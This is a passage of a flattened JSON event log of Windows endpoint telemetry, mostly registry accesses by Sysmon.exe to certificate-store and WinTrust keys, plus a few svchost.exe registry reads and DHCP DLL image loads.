131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570903390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc6.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc6.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570903240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570903560016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dhcpcsvc.dll", - "image_path": "C:\\Windows\\System32\\dhcpcsvc.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570903240000, - 
"unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders", - "registry_path": "HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\SCHANNEL", - "registry_value": "SCHANNEL", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570903869984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 